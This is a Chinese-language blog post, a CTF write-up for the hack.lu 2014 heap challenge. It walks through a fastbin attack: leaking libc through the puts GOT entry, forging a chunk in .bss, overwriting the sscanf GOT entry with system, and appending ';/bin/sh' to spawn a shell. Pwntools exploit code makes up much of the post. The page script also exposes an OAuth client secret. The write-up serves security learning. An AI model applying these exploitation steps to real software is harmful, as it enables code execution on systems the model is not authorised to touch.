<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <title>
    fastbin-attack 2014 hacklu |
    
    summerN&#39;s blog</title>
  
    <link rel="shortcut icon" href="/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<script src="/js/pace.min.js"></script>

<meta name="generator" content="Hexo 4.1.1"><link rel="alternate" href="/atom.xml" title="summerN's blog" type="application/atom+xml">
</head>

<body>
<main class="content">
  <section class="outer">
  

<article id="post-fastbin-attack 2014 hacklu" class="article article-type-post" itemscope itemprop="blogPost" data-scroll-reveal>
  
  <div class="article-inner">
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      fastbin-attack 2014 hacklu
    </h1>
  
  




      </header>
    

    
      <div class="article-meta">
        <a href="/2020/02/11/fastbin-attack%202014%20hacklu/" class="article-date">
  <time datetime="2020-02-11T13:48:53.054Z" itemprop="datePublished">2020-02-11</time>
</a>
        
      </div>
    

    
      
    <div class="tocbot"></div>





    

    <div class="article-entry" itemprop="articleBody">
      


      

      
        <h1 id="fastbin-attack-2014-hack-lu"><a href="#fastbin-attack-2014-hack-lu" class="headerlink" title="fastbin-attack 2014 hack.lu"></a>fastbin-attack 2014 hack.lu</h1><a id="more"></a>

<p>这应该是我能看得懂的第一个堆类题目了</p>
<p>首先checksec</p>
<p><a href="https://imgchr.com/i/1sOZtS" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2020/02/05/1sOZtS.png" alt="1sOZtS.png"></a></p>
<p>还可</p>
<p>看程序</p>
<p>[<img src="https://s2.ax1x.com/2020/02/05/1sOefg.png" alt="1sOefg.png"></p>
<p>大体来说有三个功能</p>
<p>1.add</p>
<p>2.show_add</p>
<p>3.order</p>
<p>4.msg</p>
<p>5.show_stats</p>
<p>6.exit</p>
<p>先看add</p>
<p>[<img src="https://s2.ax1x.com/2020/02/05/1sOnpQ.png" alt="1sOnpQ.png"></p>
<p>这里我们调试一下</p>
<p>发现我们输入的是一个结构体</p>
<p>dword_804A288代表堆地址我们成为tmp_heap</p>
<p>tmp_heap+13 实际上是 +52个字节，这里放置的是上一个heap的地址，即last_heap</p>
<p>然后tmp_heap后面的25个字节后放name</p>
<p>在tmp_heap后面放description</p>
<p>fgets存在溢出，我们可以输入的字节为56个，我们可以通过name来覆盖掉last_heap的地址，然后通过show_add()来泄露libc基地址</p>
<p>同时0x804a2a4位置内容加一</p>
<p>且我们可以看到0x804a2a8存放了0x804a2c0的地址</p>
<p>图床不好，，先不放图。。抱歉</p>
<h3 id="step-1"><a href="#step-1" class="headerlink" title="step 1"></a>step 1</h3><p>我们先泄露出libc的基地址</p>
<p>我们name输入‘a’*27之后，在输入就会覆盖掉last_heap</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#leak libc</span></span><br><span class="line">puts_got = elf.got[<span class="string">'puts'</span>]</span><br><span class="line">name = <span class="string">'a'</span> * <span class="number">27</span> + p32(puts_got)</span><br><span class="line">add(name,<span class="string">'a'</span>*<span class="number">25</span>)</span><br><span class="line">show_add()</span><br><span class="line">p.recvuntil(<span class="string">'Description: '</span>)</span><br><span class="line">p.recvuntil(<span class="string">'Description: '</span>)</span><br><span class="line">puts_add = p.recv(<span class="number">4</span>).strip(<span class="string">'\n'</span>).ljust(<span class="number">4</span>,<span class="string">'\x00'</span>)</span><br><span class="line">libc = LibcSearcher(puts,int(puts_add))</span><br><span class="line">libc_add = puts_add - libc.dump(<span class="string">'puts'</span>)</span><br><span class="line">system_add = libc_add + libc.dump(<span class="string">'system'</span>)</span><br><span class="line">str_bin_sh = libc_add + libc.dump(<span class="string">'str_bin_sh'</span>)</span><br></pre></td></tr></table></figure>

<h3 id="step2"><a href="#step2" class="headerlink" title="step2"></a>step2</h3><p>要在bss段上分配堆，首先需要堆上有合适的size以满足malloc(0x38)的条件。这里我们需要的size为0x40，这是因为我们的数据结构的内容大小为0x38，因此整个chunk的size就为0x40。而如果data段是从0x0804a2a8开始，那么size就位于0x0804a2a8-4=0x0804a2a4处，观察一下这里刚好是number的地址，number的地址就为我们构造堆的大小的位置，因此我们就需要在分配到0x0804a2a8前添加0x40次。</p>
<p>所以我们先申请0x40-2次，因为我们之前已经申请了一次，并且这些的last_heap腰腹改为\x00且最后一个我们的last_heap为0x804a2a8</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#fake chunk</span></span><br><span class="line">name1 = <span class="string">'a'</span> * <span class="number">27</span> + p32(<span class="number">0</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0x3e</span>):</span><br><span class="line">	add(name1,<span class="string">'a'</span> * <span class="number">25</span>)</span><br><span class="line">name2 = <span class="string">'a'</span> * <span class="number">27</span> + p32(<span class="number">0x0804a2a8</span>)</span><br><span class="line">add(name2,<span class="string">'a'</span> * <span class="number">25</span>)</span><br></pre></td></tr></table></figure>

<p>之后我们需要绕过next_chunksize的检查</p>
<p>刚才我们知道0x804a2a8存放了0x804a2c0的地址</p>
<p>并且根据源码可知，我们的msg通过这个地址放入到了0x804a2c0处</p>
<p>我们的fake_chunk从0x804a2a8开始</p>
<p>所以长度为：0x38-(0x804a2c0-0x804a2a8)=0x20</p>
<p>这里的last_chunk也要设置为0000防止出现再free</p>
<p>并且还要设置大小，这个大小很随意，符合条件即可</p>
<p>所以有</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#我们需要绕过next_chunksize的检查</span></span><br><span class="line">payload = <span class="string">'\x00'</span> * <span class="number">0x20</span> + <span class="string">'\x00'</span> * <span class="number">4</span> + p32(<span class="number">100</span>)</span><br><span class="line">msg(payload)</span><br></pre></td></tr></table></figure>

<p>之后free掉就可以</p>
<p>之后我们看一下链表</p>
<p>发现fastbin空闲链表中有我们的伪造的链表0x804a2a0 data区域位0x804a2a0 + 8 = 0x804a2a8</p>
<h3 id="step3"><a href="#step3" class="headerlink" title="step3"></a>step3</h3><p>最后就是getshell的步骤，即劫持got地址</p>
<p>因为我们每次的输入都会执行到刚开始输入action的时候，那是都会执行__isoc99_sscanf这个函数</p>
<p>所以我们劫持他的got地址即可</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">p.recvuntil(<span class="string">'submitted!\n'</span>)</span><br><span class="line">payload1 = elf.got[<span class="string">'__isoc99_sscanf'</span>]</span><br><span class="line">add(<span class="string">'a'</span>,payload1)</span><br><span class="line">msg(p32(system_add)+<span class="string">';/bin/sh\x00'</span>)</span><br><span class="line"><span class="comment">#p.sendline('/bin/sh\x00')</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>[<img src="https://s2.ax1x.com/2020/02/05/1sOK6s.png" alt="1sOK6s.png"></p>
<p>显而易见，这里get一个新的bin/方法</p>
<p>这里有个新姿势：system(“ls;/bin/sh”)就相当于sytem(“ls”);system(“/bin/sh”);分号代表system函数将这个参数分成两部分，先后执行里面的命令。因此这里在fgets函数篡改了strlen_got后紧接着调用strlen，就相当于system(p32(system_addr);”/bin/sh”) = system(p32(system_addr));system(“/bin/sh”);</p>
<p>这样就能实现最终目的了。</p>
<p>完成，耗时三天，撒花0.0</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://summern.club/2020/02/11/fastbin-attack%202014%20hacklu/" data-id="ck9iicmt2000awolu6fth8qos"
         class="article-share-link">Share</a>
      
    </footer>

  </div>

  
    
  <nav class="article-nav">
    
      <a href="/2020/02/13/buuctf/" class="article-nav-link">
        <strong class="article-nav-caption">Newer posts</strong>
        <div class="article-nav-title">
          
            buuctf pwn
          
        </div>
      </a>
    
    
      <a href="/2020/02/11/%E9%80%9A%E8%BF%872017%200ctf%20babyheap%20%E5%AD%A6%E4%B9%A0unsortbin%E6%B3%84%E9%9C%B2libc%E5%9C%B0%E5%9D%80/" class="article-nav-link">
        <strong class="article-nav-caption">Olde posts</strong>
        <div class="article-nav-title">通过2017 0ctf babyheap 学习unsortbin泄露libc地址</div>
      </a>
    
  </nav>


  

  
    
  <div class="gitalk" id="gitalk-container"></div>
  
<link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">

  
<script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>

  
<script src="https://cdn.bootcss.com/blueimp-md5/2.10.0/js/md5.min.js"></script>

  <script type="text/javascript">
    var gitalk = new Gitalk({
      clientID: '665e1db541e975225bc6',
      clientSecret: '525f3534fe6005375cf8c02330ed09a2b7aab7d5',
      repo: 'talk',
      owner: 'summerN',
      admin: ['summerN'],
      // id: location.pathname,      // Ensure uniqueness and length less than 50
      id: md5(location.pathname),
      distractionFreeMode: false,  // Facebook-like distraction free mode
      pagerDirection: 'last'
    })

  gitalk.render('gitalk-container')
  </script>

  

</article>



</section>
  <footer class="footer">
  <div class="outer">
    <div class="float-right">
      <ul class="list-inline">
  
    <li><i class="fe fe-smile-alt"></i> <span id="busuanzi_value_site_uv"></span></li>
  
</ul>
    </div>
    <ul class="list-inline">
      <li>&copy; 2020 summerN&#39;s blog</li>
      <li>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a></li>
      <li>Theme  <a href="https://github.com/zhwangart/hexo-theme-ocean" target="_blank" rel="noopener">Ocean</a></li>
    </ul>
  </div>
</footer>

</main>

<aside class="sidebar sidebar-specter">
  
    <button class="navbar-toggle"></button>
<nav class="navbar">
  
    <div class="logo">
      <a href="/"><img src="/images/hexo.svg" alt="summerN&#39;s blog"></a>
    </div>
  
  <ul class="nav nav-main">
    
      <li class="nav-item">
        <a class="nav-item-link" href="/">Home</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/archives">Archives</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/gallery">Gallery</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/about">About</a>
      </li>
    
    <li class="nav-item">
      <a class="nav-item-link nav-item-search" title="Search">
        <i class="fe fe-search"></i>
        Search
      </a>
    </li>
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      <div class="totop" id="totop">
  <i class="fe fe-rocket"></i>
</div>
    </li>
    <li class="nav-item">
      
        <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
          <i class="fe fe-feed"></i>
        </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
  </aside>
  
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/jquery.justifiedGallery.min.js"></script>


<script src="/js/lazyload.min.js"></script>


<script src="/js/busuanzi-2.3.pure.min.js"></script>


  
<script src="/fancybox/jquery.fancybox.min.js"></script>




  
<script src="/js/tocbot.min.js"></script>

  <script>
    // Tocbot_v4.7.0  http://tscanlin.github.io/tocbot/
    tocbot.init({
      tocSelector: '.tocbot',
      contentSelector: '.article-entry',
      headingSelector: 'h1, h2, h3, h4, h5, h6',
      hasInnerContainers: true,
      scrollSmooth: true,
      positionFixedSelector: '.tocbot',
      positionFixedClass: 'is-position-fixed',
      fixedSidebarOffset: 'auto',
    });
  </script>



<script src="/js/ocean.js"></script>


</body>
</html>